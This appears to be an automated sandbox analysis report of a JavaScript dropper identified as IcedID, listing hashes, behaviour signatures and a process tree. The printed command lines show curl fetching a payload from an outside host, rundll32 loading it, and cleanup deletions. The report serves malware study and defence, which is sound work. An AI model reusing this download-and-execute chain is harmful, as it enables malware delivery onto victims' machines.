Analysis
max time kernel: 141s
max time network: 152s
platform: windows10-2004_x64
resource: win10v2004-20230831-en
resource tags: arch:x64, arch:x86, image:win10v2004-20230831-en, locale:en-us, os:windows10-2004-x64, system
submitted: 01/09/2023, 16:49
Static task: static1
Behavioral task: behavioral1
  Sample: fd685d5811578ac189ffc6802615e11c86424765cc231a024e97c03c99f37947_JC.js
  Resource: win7-20230831-en
Behavioral task: behavioral2
  Sample: fd685d5811578ac189ffc6802615e11c86424765cc231a024e97c03c99f37947_JC.js
  Resource: win10v2004-20230831-en
General
Target: fd685d5811578ac189ffc6802615e11c86424765cc231a024e97c03c99f37947_JC.js
Size: 34KB
MD5: d38a35de750d0d8628cb073a9a0ad8b2
SHA1: b98af1c8fe2a75060fa25a7eee20c32518271822
SHA256: fd685d5811578ac189ffc6802615e11c86424765cc231a024e97c03c99f37947
SHA512: b7348f060b646efd8e7501ce7a411346b7de95a715b7a1d2294df32c2b4ed425262ef0102af2d72c5f3d0f5f8db2f0feede4f5885a2fa6d48f9c2c9b40cde247
SSDEEP: 768:RwRahuDvIhINs1sCT7A797k7a7a7Q7u7F7r7e7I7B7C7D7N7y7o727B7of7y7M76:RwRahBhIN3CTMJ4W+cC5fS0VWnJWk6l5
Malware Config
Extracted
icedid
4240553492
oopscokir.com
Signatures
- Downloads MZ/PE file
- Checks computer location settings (2 TTPs, 1 IoC)
  Looks up country code configured in the registry, likely geofence.
  description: Key value queried
  ioc: \REGISTRY\USER\S-1-5-21-1980726966-773384374-2129981223-1000\Control Panel\International\Geo\Nation
  Process: wscript.exe
- Loads dropped DLL (1 IoC)
  pid 4856, Process rundll32.exe
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious behavior: EnumeratesProcesses (10 IoCs)
  pid 4856, Process rundll32.exe (listed 8 times)
  pid 3340, Process not Found (listed 2 times)
- Suspicious behavior: MapViewOfSection (1 IoC)
  pid 4856, Process rundll32.exe
- Suspicious use of WriteProcessMemory (14 IoCs)
  description                        pid   Process      procid_target
  PID 4248 wrote to memory of 4976   4248  wscript.exe  83
  PID 4248 wrote to memory of 4976   4248  wscript.exe  83
  PID 4248 wrote to memory of 2592   4248  wscript.exe  85
  PID 4248 wrote to memory of 2592   4248  wscript.exe  85
  PID 4248 wrote to memory of 4524   4248  wscript.exe  87
  PID 4248 wrote to memory of 4524   4248  wscript.exe  87
  PID 4524 wrote to memory of 3696   4524  cmd.exe      89
  PID 4524 wrote to memory of 3696   4524  cmd.exe      89
  PID 4248 wrote to memory of 2404   4248  wscript.exe  94
  PID 4248 wrote to memory of 2404   4248  wscript.exe  94
  PID 4248 wrote to memory of 4856   4248  wscript.exe  96
  PID 4248 wrote to memory of 4856   4248  wscript.exe  96
  PID 4248 wrote to memory of 888    4248  wscript.exe  97
  PID 4248 wrote to memory of 888    4248  wscript.exe  97
Processes
C:\Windows\system32\wscript.exe  (PID 4248)
  cmdline: wscript.exe C:\Users\Admin\AppData\Local\Temp\fd685d5811578ac189ffc6802615e11c86424765cc231a024e97c03c99f37947_JC.js
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  C:\Windows\System32\cmd.exe  (PID 4976)
    cmdline: "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\fd685d5811578ac189ffc6802615e11c86424765cc231a024e97c03c99f37947_JC.js"
  C:\Windows\System32\cmd.exe  (PID 2592)
    cmdline: "C:\Windows\System32\cmd.exe" /c echo curl https://avestainfratech.com/out/t.php --output "C:\Users\Admin\AppData\Local\Temp\dignissimos.neaque.x" --ssl-no-revoke --insecure --location > "C:\Users\Admin\AppData\Local\Temp\dignissimos.n.bat"
  C:\Windows\System32\cmd.exe  (PID 4524)
    cmdline: "C:\Windows\System32\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\dignissimos.n.bat"
    - Suspicious use of WriteProcessMemory
    C:\Windows\system32\curl.exe  (PID 3696)
      cmdline: curl https://avestainfratech.com/out/t.php --output "C:\Users\Admin\AppData\Local\Temp\dignissimos.neaque.x" --ssl-no-revoke --insecure --location
  C:\Windows\System32\cmd.exe  (PID 2404)
    cmdline: "C:\Windows\System32\cmd.exe" /c ren "C:\Users\Admin\AppData\Local\Temp\dignissimos.neaque.x" "dignissimos.n"
  C:\Windows\System32\rundll32.exe  (PID 4856)
    cmdline: "C:\Windows\System32\rundll32.exe" "C:\Users\Admin\AppData\Local\Temp\dignissimos.n", scab /k arabika752
    - Loads dropped DLL
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
  C:\Windows\System32\cmd.exe  (PID 888)
    cmdline: "C:\Windows\System32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\dignissimos.n.bat"
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 638KB
MD5: 3601ef1cf714bb9fd40ce1652e6bffeb
SHA1: d652aada52ae0e93692e2065d9c93cf133537eab
SHA256: 3f37e609296627b612ba88cecf1fb90985ff5b9760510f8a6127de0d7a9cf1e2
SHA512: 0a4e4ed9d24784ff1cee5183adbd3bece731b087217368a683c697d85db42f79682007dfae9c3aa72ec4cef5dd3942404da4cd6acefcb4bf037e00369a16ec08

Filesize: 149B
MD5: c35fe7fbb1aec6c72da5d0fdeb26c222
SHA1: f0ef85f0d7fed0b54dc9f7fadf777089b1f404f8
SHA256: 737835adf64ffb2bfd6dc3d7ab2d23d2c82f292ec736997f5fa5f89eb8c13983
SHA512: 727213eeebfeb2222113a683e681642bbb7d3df42e32ae0e4457689b7bb8c6630122b1b6c1d220073b1ac44c749cf03d3074ec034237cec2f0680126eef875ff